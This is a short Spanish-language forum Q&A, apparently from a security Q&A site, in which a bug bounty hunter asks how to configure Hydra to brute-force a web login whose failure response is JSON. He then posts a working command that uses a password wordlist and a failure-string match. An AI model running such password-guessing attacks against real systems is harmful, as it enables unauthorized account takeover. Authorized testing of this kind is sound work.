¿Cómo ejecutar Hydra con respuesta json?

3

He estado haciendo algunas caza de recompensas de errores y he tenido problemas con la hidra. Así que hay un formulario de inicio de sesión https, la solicitud es:

https://bbsite/crp/login?password=pass&username=admin

El problema es que la respuesta está en json. Así que para un mal inicio de sesión es:

{"success":false,"greska":"Pogre\u0161no."}

Así que mi solución fue:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Pero esto no está funcionando, y no tengo idea de por qué. ¿Alguien puede sugerir una solución?

    
pregunta Daniel Max 22.03.2016 - 17:01
fuente

1 respuesta

2

Solución encontrada:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Se necesita agregar F = para el inicio de sesión fallido. Necesario para escapar \ con \.

    
respondido por el Daniel Max 22.03.2016 - 17:09
fuente

Lea otras preguntas en las etiquetas